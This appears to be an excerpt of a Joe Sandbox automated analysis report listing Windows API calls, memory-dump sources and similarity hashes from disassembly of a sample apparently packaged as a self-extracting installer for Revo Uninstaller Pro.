  • Part of subcall function 00FED53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FED5C8
Memory Dump Source
• Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00FED217
  • Part of subcall function 00FED53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FED5B7
  • Part of subcall function 00FED53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FED5C8
Memory Dump Source
• Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00FED217
  • Part of subcall function 00FED53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FED5B7
  • Part of subcall function 00FED53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FED5C8
Memory Dump Source
• Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00FED1B6
  • Part of subcall function 00FED53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FED5B7
  • Part of subcall function 00FED53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FED5C8
Memory Dump Source
• Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
                                                                                                                                                                            APIs
                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?,00FE9CE4,C:\Program Files\VS Revo Group\Revo Uninstaller Pro,00000000,010185FA,00000006), ref: 00FE9A91
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmp
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmp
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmp
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CurrentDirectory
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1611563598-0
                                                                                                                                                                            • Opcode ID: 676a2306a658b5a3ca153aa530d98cf6e4b8b5c767b03ec849fc1b8c6d86a3e1
                                                                                                                                                                            • Instruction ID: e9f176095c5bdd07656139433b9691a36ca2a46d81b7eba142e376d0909a6ad7
                                                                                                                                                                            • Opcode Fuzzy Hash: 676a2306a658b5a3ca153aa530d98cf6e4b8b5c767b03ec849fc1b8c6d86a3e1
                                                                                                                                                                            • Instruction Fuzzy Hash: 61A01230194006468A114B30C80DC1576515770702F0086207142C0094CB318810A600
                                                                                                                                                                            APIs
                                                                                                                                                                            • CloseHandle.KERNEL32(000000FF,?,?,00FD94AA), ref: 00FD94F5
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CloseHandle
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2962429428-0
                                                                                                                                                                            • Opcode ID: d3c1c01261f496d3bcae9985fa85932609916854cbee5e8650b7164e6885c9f8
                                                                                                                                                                            • Instruction ID: 372ba59d5bbad7658ebf9e3cccb3f0ecfcf7818660a9207358c893929caa74be
                                                                                                                                                                            • Opcode Fuzzy Hash: d3c1c01261f496d3bcae9985fa85932609916854cbee5e8650b7164e6885c9f8
                                                                                                                                                                            • Instruction Fuzzy Hash: 76F089708467044EDB318B64D549792B7E59B11735F0C8B2FD0E7476D0D3B5684DEB10
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00FD12D7: GetDlgItem.USER32(00000000,00003021), ref: 00FD131B
                                                                                                                                                                              • Part of subcall function 00FD12D7: SetWindowTextW.USER32(00000000,010022E4), ref: 00FD1331
                                                                                                                                                                            • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00FEB04A
                                                                                                                                                                            • EndDialog.USER32(?,00000006), ref: 00FEB05D
                                                                                                                                                                            • GetDlgItem.USER32(?,0000006C), ref: 00FEB079
                                                                                                                                                                            • SetFocus.USER32(00000000), ref: 00FEB080
                                                                                                                                                                            • SetDlgItemTextW.USER32(?,00000065,?), ref: 00FEB0C0
                                                                                                                                                                            • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00FEB0F3
                                                                                                                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 00FEB109
                                                                                                                                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00FEB127
                                                                                                                                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 00FEB137
                                                                                                                                                                            • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00FEB154
                                                                                                                                                                            • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00FEB172
                                                                                                                                                                            • _swprintf.LIBCMT ref: 00FEB1A2
                                                                                                                                                                              • Part of subcall function 00FD3E41: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00FD3E54
                                                                                                                                                                            • SetDlgItemTextW.USER32(?,0000006A,?), ref: 00FEB1B5
                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00FEB1B8
                                                                                                                                                                            • _swprintf.LIBCMT ref: 00FEB213
                                                                                                                                                                            • SetDlgItemTextW.USER32(?,00000068,?), ref: 00FEB226
                                                                                                                                                                            • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00FEB23C
                                                                                                                                                                            • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 00FEB25C
                                                                                                                                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 00FEB26C
                                                                                                                                                                            • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00FEB286
                                                                                                                                                                            • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00FEB29E
                                                                                                                                                                            • _swprintf.LIBCMT ref: 00FEB2CF
                                                                                                                                                                            • SetDlgItemTextW.USER32(?,0000006B,?), ref: 00FEB2E2
                                                                                                                                                                            • _swprintf.LIBCMT ref: 00FEB332
                                                                                                                                                                            • SetDlgItemTextW.USER32(?,00000069,?), ref: 00FEB345
                                                                                                                                                                              • Part of subcall function 00FE9D99: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00FE9DBF
                                                                                                                                                                              • Part of subcall function 00FE9D99: GetNumberFormatW.KERNEL32(00000400,00000000,?,0100D600,?,?), ref: 00FE9E0E
                                                                                                                                                                            Strings
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                                                                                                                                                            • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                                                                                                                                                            • API String ID: 797121971-1840816070
                                                                                                                                                                            • Opcode ID: f45cff89c270a26dd92895ab888d338320f826cce50b08ff895897f9ccc77127
                                                                                                                                                                            • Instruction ID: 44b1c30c479188e37e9acaf0ec5a8df53e3bcc56d9e5b460a7cf5035d884b20d
                                                                                                                                                                            • Opcode Fuzzy Hash: f45cff89c270a26dd92895ab888d338320f826cce50b08ff895897f9ccc77127
                                                                                                                                                                            • Instruction Fuzzy Hash: F591B472548349BFE232DBA1CC49FFB77ACEB89700F044819B789D6081D779AA049762
                                                                                                                                                                            APIs
                                                                                                                                                                            • __EH_prolog.LIBCMT ref: 00FD6FCB
                                                                                                                                                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,00000001), ref: 00FD712B
                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00FD713B
                                                                                                                                                                              • Part of subcall function 00FD7A15: GetCurrentProcess.KERNEL32(00000020,?), ref: 00FD7A24
                                                                                                                                                                              • Part of subcall function 00FD7A15: GetLastError.KERNEL32 ref: 00FD7A6A
                                                                                                                                                                              • Part of subcall function 00FD7A15: CloseHandle.KERNEL32(?), ref: 00FD7A79
                                                                                                                                                                            • CreateDirectoryW.KERNEL32(?,00000000,?,00000001), ref: 00FD7146
                                                                                                                                                                            • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00FD7254
                                                                                                                                                                            • DeviceIoControl.KERNEL32(00000000,000900A4,?,-00000008,00000000,00000000,?,00000000), ref: 00FD7280
                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00FD7292
                                                                                                                                                                            • GetLastError.KERNEL32(00000015,00000000,?), ref: 00FD72A2
                                                                                                                                                                            • RemoveDirectoryW.KERNEL32(?), ref: 00FD72EE
                                                                                                                                                                            • DeleteFileW.KERNEL32(?), ref: 00FD7316
                                                                                                                                                                            Strings
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CloseCreateFileHandle$DirectoryErrorLast$ControlCurrentDeleteDeviceH_prologProcessRemove
                                                                                                                                                                            • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                                                                                                            • API String ID: 3935142422-3508440684
                                                                                                                                                                            • Opcode ID: 1858dab79c7655ad748ace5194a5fea376af42cb9f47b926b727d89857c4c9a9
                                                                                                                                                                            • Instruction ID: 21f962c77b64fb4308c6ca32e2a18607dd71b8e620a634ce3bcddfe1d4e679be
                                                                                                                                                                            • Opcode Fuzzy Hash: 1858dab79c7655ad748ace5194a5fea376af42cb9f47b926b727d89857c4c9a9
                                                                                                                                                                            • Instruction Fuzzy Hash: 22B1F571D043589FEB21EF64CC45BEE73B9AF04300F08459AF959EB242E778AA45DB60
APIs
• FindResourceW.KERNEL32(00000066,PNG,?,?,00FEA54A,00000066), ref: 00FE964B
• SizeofResource.KERNEL32(00000000,75295780,?,?,00FEA54A,00000066), ref: 00FE9663
• LoadResource.KERNEL32(00000000,?,?,00FEA54A,00000066), ref: 00FE9676
• LockResource.KERNEL32(00000000,?,?,00FEA54A,00000066), ref: 00FE9681
• GlobalAlloc.KERNEL32(00000002,00000000,00000000,?,?,?,00FEA54A,00000066), ref: 00FE969F
• GlobalLock.KERNEL32(00000000), ref: 00FE96AC
• GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00FE9707
• GlobalUnlock.KERNEL32(00000000), ref: 00FE971C
• GlobalFree.KERNEL32(00000000), ref: 00FE9723
Strings
Memory Dump Source
• Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
Similarity
• API ID: GlobalResource$Lock$AllocBitmapCreateFindFreeFromGdipLoadSizeofUnlock
• String ID: PNG
• API String ID: 4097654274-364855578
APIs
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00FF7CD9
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00FF7CE3
• UnhandledExceptionFilter.KERNEL32(-00000311,?,?,?,?,?,00000000), ref: 00FF7CF0
Strings
Memory Dump Source
• Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
Similarity
• API ID: ExceptionFilterUnhandled$DebuggerPresent
• String ID: 6P+
• API String ID: 3906539128-3080146196
APIs
• GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00FE9DBF
• GetNumberFormatW.KERNEL32(00000400,00000000,?,0100D600,?,?), ref: 00FE9E0E
Memory Dump Source
• Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
Similarity
• API ID: FormatInfoLocaleNumber
• String ID:
• API String ID: 2169056816-0
APIs
• GetLastError.KERNEL32(00FE0DE0,?,00000200), ref: 00FD6D06
• FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00FD6D27
Memory Dump Source
• Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
Similarity
• API ID: ErrorFormatLastMessage
• String ID:
• API String ID: 3479602957-0
APIs
• SetUnhandledExceptionFilter.KERNEL32(Function_0001E64F,00FEE084), ref: 00FEE648
Memory Dump Source
• Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
APIs
Memory Dump Source
• Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
Similarity
• API ID: HeapProcess
• String ID:
• API String ID: 54951025-0
APIs
• __EH_prolog.LIBCMT ref: 00FEB4CC
  • Part of subcall function 00FEA156: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 00FEA21E
• SetFileAttributesW.KERNEL32(?,00000005,?,?,?,00000800,?,?,00000000,00000001,00FEADDF,?,00000000), ref: 00FEB601
• SHFileOperationW.SHELL32(?), ref: 00FEB6AE
• GetFileAttributesW.KERNEL32(?), ref: 00FEB6BB
• DeleteFileW.KERNEL32(?), ref: 00FEB6C9
• SetWindowTextW.USER32(?,?), ref: 00FEB812
• _wcsrchr.LIBVCRUNTIME ref: 00FEB99C
• GetDlgItem.USER32(?,00000066), ref: 00FEB9D7
• SetWindowTextW.USER32(00000000,?), ref: 00FEB9E7
• SendMessageW.USER32(00000000,00000143,00000000,01019602), ref: 00FEB9FB
• SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00FEBA24
Strings
Memory Dump Source
• Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
Similarity
• API ID: File$AttributesMessageSendTextWindow$DeleteEnvironmentExpandH_prologItemOperationStrings_wcsrchr
• String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
• API String ID: 764735972-312220925
APIs
• _swprintf.LIBCMT ref: 00FDD731
  • Part of subcall function 00FD3E41: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00FD3E54
  • Part of subcall function 00FE11FA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,01010078,?,00FDCE91,00000000,?,00000050,01010078), ref: 00FE1217
• _strlen.LIBCMT ref: 00FDD752
• SetDlgItemTextW.USER32(?,0100D154,?), ref: 00FDD7B2
• GetWindowRect.USER32(?,?), ref: 00FDD7EC
• GetClientRect.USER32(?,?), ref: 00FDD7F8
• GetWindowLongW.USER32(?,000000F0), ref: 00FDD896
• GetWindowRect.USER32(?,?), ref: 00FDD8C3
• SetWindowTextW.USER32(?,?), ref: 00FDD906
• GetSystemMetrics.USER32(00000008), ref: 00FDD90E
• GetWindow.USER32(?,00000005), ref: 00FDD919
• GetWindowRect.USER32(00000000,?), ref: 00FDD946
• GetWindow.USER32(00000000,00000002), ref: 00FDD9B8
Strings
Memory Dump Source
• Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
Similarity
• API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
• String ID: $%s:$CAPTION$d
• API String ID: 2407758923-2512411981
APIs
• ___free_lconv_mon.LIBCMT ref: 00FFB7C8
  • Part of subcall function 00FFB363: _free.LIBCMT ref: 00FFB380
  • Part of subcall function 00FFB363: _free.LIBCMT ref: 00FFB392
  • Part of subcall function 00FFB363: _free.LIBCMT ref: 00FFB3A4
  • Part of subcall function 00FFB363: _free.LIBCMT ref: 00FFB3B6
  • Part of subcall function 00FFB363: _free.LIBCMT ref: 00FFB3C8
  • Part of subcall function 00FFB363: _free.LIBCMT ref: 00FFB3DA
  • Part of subcall function 00FFB363: _free.LIBCMT ref: 00FFB3EC
  • Part of subcall function 00FFB363: _free.LIBCMT ref: 00FFB3FE
  • Part of subcall function 00FFB363: _free.LIBCMT ref: 00FFB410
  • Part of subcall function 00FFB363: _free.LIBCMT ref: 00FFB422
  • Part of subcall function 00FFB363: _free.LIBCMT ref: 00FFB434
  • Part of subcall function 00FFB363: _free.LIBCMT ref: 00FFB446
  • Part of subcall function 00FFB363: _free.LIBCMT ref: 00FFB458
• _free.LIBCMT ref: 00FFB7BD
  • Part of subcall function 00FF7A50: RtlFreeHeap.NTDLL(00000000,00000000,?,00FFB4F8,?,00000000,?,00000000,?,00FFB51F,?,00000007,?,?,00FFB91C,?), ref: 00FF7A66
  • Part of subcall function 00FF7A50: GetLastError.KERNEL32(?,?,00FFB4F8,?,00000000,?,00000000,?,00FFB51F,?,00000007,?,?,00FFB91C,?,?), ref: 00FF7A78
• _free.LIBCMT ref: 00FFB7DF
• _free.LIBCMT ref: 00FFB7F4
• _free.LIBCMT ref: 00FFB7FF
• _free.LIBCMT ref: 00FFB821
• _free.LIBCMT ref: 00FFB834
• _free.LIBCMT ref: 00FFB842
• _free.LIBCMT ref: 00FFB84D
• _free.LIBCMT ref: 00FFB885
• _free.LIBCMT ref: 00FFB88C
• _free.LIBCMT ref: 00FFB8A9
• _free.LIBCMT ref: 00FFB8C1
Memory Dump Source
• Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast___free_lconv_mon
• String ID:
• API String ID: 161543041-0
APIs
• GetWindow.USER32(?,00000005), ref: 00FEC364
• GetClassNameW.USER32(00000000,?,00000800), ref: 00FEC393
  • Part of subcall function 00FE1410: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,00FDACFE,?,?,?,00FDACAD,?,-00000002,?,00000000,?), ref: 00FE1426
• GetWindowLongW.USER32(00000000,000000F0), ref: 00FEC3B1
• SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00FEC3C8
• GetObjectW.GDI32(00000000,00000018,?), ref: 00FEC3DB
  • Part of subcall function 00FE958C: GetDC.USER32(00000000), ref: 00FE9598
  • Part of subcall function 00FE958C: GetDeviceCaps.GDI32(00000000,0000005A), ref: 00FE95A7
  • Part of subcall function 00FE958C: ReleaseDC.USER32(00000000,00000000), ref: 00FE95B5
  • Part of subcall function 00FE9549: GetDC.USER32(00000000), ref: 00FE9555
  • Part of subcall function 00FE9549: GetDeviceCaps.GDI32(00000000,00000058), ref: 00FE9564
  • Part of subcall function 00FE9549: ReleaseDC.USER32(00000000,00000000), ref: 00FE9572
• SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00FEC402
• DeleteObject.GDI32(00000000), ref: 00FEC409
• GetWindow.USER32(00000000,00000002), ref: 00FEC412
Strings
Memory Dump Source
• Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
Similarity
• API ID: Window$CapsDeviceMessageObjectReleaseSend$ClassCompareDeleteLongNameString
• String ID: STATIC
• API String ID: 1444658586-1882779555
                                                                                                                                                                            APIs
                                                                                                                                                                            • _free.LIBCMT ref: 00FF8436
                                                                                                                                                                              • Part of subcall function 00FF7A50: RtlFreeHeap.NTDLL(00000000,00000000,?,00FFB4F8,?,00000000,?,00000000,?,00FFB51F,?,00000007,?,?,00FFB91C,?), ref: 00FF7A66
                                                                                                                                                                              • Part of subcall function 00FF7A50: GetLastError.KERNEL32(?,?,00FFB4F8,?,00000000,?,00000000,?,00FFB51F,?,00000007,?,?,00FFB91C,?,?), ref: 00FF7A78
                                                                                                                                                                            • _free.LIBCMT ref: 00FF8442
                                                                                                                                                                            • _free.LIBCMT ref: 00FF844D
                                                                                                                                                                            • _free.LIBCMT ref: 00FF8458
                                                                                                                                                                            • _free.LIBCMT ref: 00FF8463
                                                                                                                                                                            • _free.LIBCMT ref: 00FF846E
                                                                                                                                                                            • _free.LIBCMT ref: 00FF8479
                                                                                                                                                                            • _free.LIBCMT ref: 00FF8484
                                                                                                                                                                            • _free.LIBCMT ref: 00FF848F
                                                                                                                                                                            • _free.LIBCMT ref: 00FF849D
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                                                            Strings
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: ;%u$x%u$xc%u
                                                                                                                                                                            • API String ID: 0-2277559157
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00FFEA62,00000000,00000000,00000000,00000000,00000000,00FF3FBF), ref: 00FFE32F
                                                                                                                                                                            • __fassign.LIBCMT ref: 00FFE3AA
                                                                                                                                                                            • __fassign.LIBCMT ref: 00FFE3C5
                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00FFE3EB
                                                                                                                                                                            • WriteFile.KERNEL32(?,00000000,00000000,00FFEA62,00000000,?,?,?,?,?,?,?,?,?,00FFEA62,00000000), ref: 00FFE40A
                                                                                                                                                                            • WriteFile.KERNEL32(?,00000000,00000001,00FFEA62,00000000,?,?,?,?,?,?,?,?,?,00FFEA62,00000000), ref: 00FFE443
                                                                                                                                                                            Strings
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                            • String ID: 6P+
